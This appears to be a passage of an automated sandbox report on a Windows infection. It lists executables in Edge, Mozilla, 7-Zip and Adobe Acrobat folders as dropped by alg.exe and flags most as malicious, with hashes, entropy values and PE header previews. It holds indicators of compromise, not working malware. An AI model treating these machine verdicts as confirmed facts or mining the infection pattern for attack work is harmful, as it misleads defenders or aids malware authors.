                                                                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2168832
                                                                                                                                                Entropy (8bit):7.940563256134219
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:wy53w24gQu3TPZ2psFkiSqwozEDmg27RnWGj:wyFQgZqsFki+ozED527BWG
                                                                                                                                                MD5:4CF34097512E3DE310EFB2079F715A6D
                                                                                                                                                SHA1:1709FD08839E5DB239A69C50CE46F8EE428468AB
                                                                                                                                                SHA-256:265E2B39FD4256E302B1B3B110736B96F700B30521C1DCF63977D3F2D624C123
                                                                                                                                                SHA-512:A03AFAA720325D6604E857D74D64786CD5002CBF8431A37D57F6D43FC0D4B86B6D427FFB634F7BA9FF222E52CB7DE42F74F710E38AD03A6A80FB01A09D5451AE
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!......3!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3141
                                                                                                                                                Entropy (8bit):4.861348068330154
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:lQdwurJcV4T9Rz3WtF23WmIFc1+5fuxf3WqF6vjx3WlbF3W07FDlUY3WqNFPw4Es:eSCRKpmBKdLYahq4BdnaD
                                                                                                                                                MD5:AED335C7CDB526910D3E4F1CF0F98B7C
                                                                                                                                                SHA1:680EE8D6BF38288AF520B5F3F678AA50F7316D62
                                                                                                                                                SHA-256:8C463B4AD04A0CAF5D7D25944D863377A7FF201154651E90A62BEDBB70A2F421
                                                                                                                                                SHA-512:39151E186C535768783E9FF648D850C26CA0E591D68CC7C5CA8039E5AFFE0C6BA6308444D6D5AD04D5B55B8F6676362C6A45EAE1A207A6437BD8DF1346839BE7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-02 01:56:09-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-02 01:56:09-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-02 01:56:0

                                                                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1356800
                                                                                                                                                Entropy (8bit):5.3478432767736015
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:bQVTZu0JpsqjnhMgeiCl7G0nehbGZpbD:sVTZucDmg27RnWGj
                                                                                                                                                MD5:FED16854B8EA309A65BF6450ECACF0D0
                                                                                                                                                SHA1:2E6ADB257921FA8FF607728BD7C4D648E435282A
                                                                                                                                                SHA-256:8401EC3450E03F27DD7189AA9526BA27D23478268FDBFF08B49F5E5AE2D7CA34
                                                                                                                                                SHA-512:3A4EB8C17514D2838154E6FE5CE355A655F287632D49C761E9395A4AF7085261BCEBA5EE89D0F97973A7F8014905BCC200C36A68EECD27F5198A95259F9E40AA
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\7-Zip\7z.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1683968
                                                                                                                                                Entropy (8bit):5.623145715994426
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:M+gkESfh4CoasqjnhMgeiCl7G0nehbGZpbD:JgkE+SoDmg27RnWGj
                                                                                                                                                MD5:231A55BFE35EAB8F38E212D8E8C73A5A
                                                                                                                                                SHA1:5D110A25B3E65717D0BB12BFC4D8E6D195E5F81F
                                                                                                                                                SHA-256:C0FF56F88D3A2E34CF6DC423FC5C1455174A5ADEC7BB11981074AC226919C1CA
                                                                                                                                                SHA-512:88652F24F6516AEE1503C12D7BF94CCA6C8AF404E2AA5279285AA3D05F8C3BB4B1AD825A2744D5DD2E17FA1A4BB0D0B03A95FE8A3191919506F440EE768B626E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1532416
                                                                                                                                                Entropy (8bit):7.0966782759727165
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:HBpDRmi78gkPXlyo0GtjrhsqjnhMgeiCl7G0nehbGZpbD:hNRmi78gkPX4o0GtjJDmg27RnWGj
                                                                                                                                                MD5:5A66AEAE16261BFA42AE2B9561477C6B
                                                                                                                                                SHA1:F48CABBEA97B0FFC77ACBC79EBEF8CFAE838BB74
                                                                                                                                                SHA-256:96120DC12D026435B346A7606760942C74CDCB6EBD71A312E7CEA2EFAFA09E64
                                                                                                                                                SHA-512:DDC195D2FF8A518B0F8350F4E63B5678810E0B70BAB66F4230BCE0193A311690F6516FDB2C9CDBA593616847638CDFC21C5AD83346FFF8E861B6569A9AD56AD6
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................Pg.... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1282048
                                                                                                                                                Entropy (8bit):7.229073239478126
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:ALOS2oTPIXVasqjnhMgeiCl7G0nehbGZpbD:4/TRDmg27RnWGj
                                                                                                                                                MD5:C38EC146DA961FF715CB73A86C0391FB
                                                                                                                                                SHA1:A74F549E65C108CEDEF75B6696E4FA314D0C0498
                                                                                                                                                SHA-256:68898E63255833CA872EC15EC9F67B675256C5AC2BC736AC3DF9BAE5A2DFBFE1
                                                                                                                                                SHA-512:95C0CA7F69567227F1C37C00DE3A5ED299F8E025E24B3B06FCC63A104406C85007C3A3071C8B40A494F88788DAF188B974A1D88BC5AD3E2D3960CE5C6D729164
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................?.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1145344
                                                                                                                                                Entropy (8bit):5.031200705264902
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:N1cXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:N1csqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:62A2A7290CA1CA7C89C99A694E3AB88F
                                                                                                                                                SHA1:82DD48E0F4D7A18922B968BEAE172C5681632958
                                                                                                                                                SHA-256:D73AB7C734F2B2A149DC9B13DC451A9BA93328D0FF3814A9CC58B50F2DB25506
                                                                                                                                                SHA-512:18A7105BC4CA6218AFFD56C5809467FAD2ABC366B65182005630136B312F62CEBE96D1D333FECE2DE4178C47CE9EF6A0899B447DCC9ACC8B2A6EE333AFEE3446
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@................................./W......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1222656
                                                                                                                                                Entropy (8bit):6.712044262854111
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:mRudzTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:mAdzTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:23089211B2DB8F85466382B869EE6DC5
                                                                                                                                                SHA1:2B41E7841EB262FC349845521793D97499FD1C0C
                                                                                                                                                SHA-256:D56A15002F892A14F8824827984FE86BD8091F38194A7325ED2E272E2D0C42AC
                                                                                                                                                SHA-512:E7B20D768170DF53B57C39169381332F9561A1D732318CDDEC24B8C2BC95EB1C764341C6B286617EB5CAE09A8CC04B9B631F236BDD3A540D6253133FFE7BDC9E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................u..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1457664
                                                                                                                                                Entropy (8bit):5.082163862101876
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Dv/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:DsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:88CDCED6D38CD8585D1C5ACDA4C758B7
                                                                                                                                                SHA1:84B560D77D31D0E234B549214994A614AAC6A61C
                                                                                                                                                SHA-256:D0A0AB744724B6CBAFEFB5315589AAEFA882B7EB829863B96C91E8A495E2417F
                                                                                                                                                SHA-512:695D2B3A56C50F0EDC09438502D03EA084013491D88E42D2FFE6AA745E92CD61FCFCBDFB39D350D6EA9C72A3B840426BA00AF1F20D0E7B37E1D34E3C80D6EF26
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@....................................J..... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1461248
                                                                                                                                                Entropy (8bit):5.4686364567503
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:f5zhM1XSEesqjnhMgeiCl7G0nehbGZpbD:jMsXDmg27RnWGj
                                                                                                                                                MD5:F9B30B22B474309411F2E8F9F52E13B3
                                                                                                                                                SHA1:E67EB8CE178589CB70BA7D3CD2D7564292273991
                                                                                                                                                SHA-256:2D8DF72F92CE497534DDFFFF1FA9930184EFBF76A5371A25AA75DC15BE7889FF
                                                                                                                                                SHA-512:A330968243A4BFD25C2D58FB344176B8D4E99D6B2CEDE2A975441FF34485B5687EA9CC7ECC6848C98C621C370B3BC3986C15450002E98C9BD71D48150856EEBA
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@....................................D..... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4151808
                                                                                                                                                Entropy (8bit):6.4997943136623215
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:XtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755NDmg27RN:XjEIa4HIEWOc57D527BWG
                                                                                                                                                MD5:E891045D3D92756AFF06E5AD88A9A96E
                                                                                                                                                SHA1:643DDAF1B1FD7A6564D9A17403E96F9F885BC82F
                                                                                                                                                SHA-256:19B15EF68BE5348CA3791572FD8C7299B35B7CF12C8E342EA2F4A8A5441E68F3
                                                                                                                                                SHA-512:88378524FB5623A59A998623FEC421890C843FCAF5262E572B01FC790773DF26AC9E664239C0CC59F9F6F4BEB91DF5CB2EC5748EFA2756209167266630F3C092
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):59941376
                                                                                                                                                Entropy (8bit):7.999367322916156
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1572864:bQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:MXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                MD5:E8C220FD138AB24B5A82FBB027058C25
                                                                                                                                                SHA1:831D349A6B09B53AFF1E97468AC6679ECEAEB85A
                                                                                                                                                SHA-256:218565C43A3827BA755806950EB4C02C745EE58735BE0171EBD2215F77D18D4C
                                                                                                                                                SHA-512:4F352F4341928E4556AEEE2672FEDEB50BB938FE19B2C994661C28465DD6EAC1A4C3A87DE61049E9882E47D23963E96A0CA6C203342D79D79BC6C29FCEF6F3D4
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......r..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1180160
                                                                                                                                                Entropy (8bit):5.084815582388739
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:JWPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:07306FA985CE9B63E5C3B77BAB0B9922
                                                                                                                                                SHA1:CB422C76989178BE8F6AA12A84D5F828E824CE1F
                                                                                                                                                SHA-256:7C9C4341F8D93F5F31ACD3A1A59254862CE8A5071D0D99A46732DD815F6E29E2
                                                                                                                                                SHA-512:D499E433FC1ADD0386BDF8C84AF56BEEF11D4ECBA79F228D8CED38606492DB43F1D8A1DF5423344D75AAA6B79B1046D40CC582ED7D9C066E2F98730BBAA9FD6D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@....... .... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6210048
                                                                                                                                                Entropy (8bit):6.3867081744638465
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:5DvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXZ:6nN9KfxLk6GEQTX5UKzNDQD527BWG
                                                                                                                                                MD5:05C27F75FEED45A4B778C8AFE1E246D9
                                                                                                                                                SHA1:32AD640D4B16111DF74CE6E086D3301FFF17FE30
                                                                                                                                                SHA-256:76B61D2C7674B8C4AA48362E7F3D1DF69BDFE6A91471D97AC45FC9B338311B40
                                                                                                                                                SHA-512:7DC2341D72F91CE9C862AFA45D19D5180E5D4836CD90A4F873B8D2BEF7EF00300EA0C7C98CC41E7BC5D94E3AEA96F949653697CA795EC00C61AFCFC225648AA6
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......k_... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1157120
                                                                                                                                                Entropy (8bit):5.041495516294096
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:4GXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:4GsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:B96557E0B6A5A46C8D4589BD2115FEFB
                                                                                                                                                SHA1:955F64B0742478DE405F9ED49F34704DAA48E1F0
                                                                                                                                                SHA-256:367D6D13EC0C96F041AB470D69D8A10B6FA8E50A26B20BF32C13AB460CE55301
                                                                                                                                                SHA-512:58022D07037E375BE173DD6618292444F4854C8D61E8816202A94E611219803F2A7437CADF0819AE53FE1B80B0670F5571FF7E3ECF2656A3E960F11F4DABD5AE
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@....................................ma.... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12039168
                                                                                                                                                Entropy (8bit):6.5966829097720066
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:8b+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKdD527BWG:unPgTHIwZoRBk9DdhSUEVIXgKdVQBWG
                                                                                                                                                MD5:C1161B318444867CB90F7E6776CD255B
                                                                                                                                                SHA1:48F16D289C6E9C83B41CBCBA0E114146FA5CCB96
                                                                                                                                                SHA-256:38267E82FBD7C95C0382876708CA726B9B927FBBF2870818A7706CDFCC9C79B8
                                                                                                                                                SHA-512:F5E50495699753464DE81CA1F5178AC29399105E2090B461BB695EFAFFFBC4FA136E6D3B2DB97952FA4EF0460C096C246586D5579F37733BA85D12B2B285124D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................?.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1322496
                                                                                                                                                Entropy (8bit):5.281824437110067
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:kg5FvCPusJsqjnhMgeiCl7G0nehbGZpbD:BfteDmg27RnWGj
                                                                                                                                                MD5:C9EF0930668C961757F81EB03BE5DC43
                                                                                                                                                SHA1:0EC89BFFFA6AED2C155EBB9FAF97DA9A3981C3C4
                                                                                                                                                SHA-256:0BD8B9FA5C841EF0331EFC882EEC0300C6FC23E1C4DE974F53570CC594887217
                                                                                                                                                SHA-512:22B9ECAC3A59EADA1D4893E56E75B70DB961319535E355E1EFE7B180C78FF24519035B1D12F3D322EB1DC79CB5AB0D8C116B4BF8BE814B0D243C91BF1758821B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1339904
                                                                                                                                                Entropy (8bit):7.208931448407581
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:sjKTIsAjFuvtIfmFthMaT5U8aChaeu7sqjnhMgeiCl7G0nehbGZpbD:sjIMmPh7TT79WDmg27RnWGj
                                                                                                                                                MD5:CE5A626CF331EC3C2C3A82E1C77CB06B
                                                                                                                                                SHA1:299005557C5999DC8DBCAD35784238BA9E19398A
                                                                                                                                                SHA-256:3A6F5C6EA638655F4C15B52A039071E444E7C460D926DB5ED0F85644767A45C4
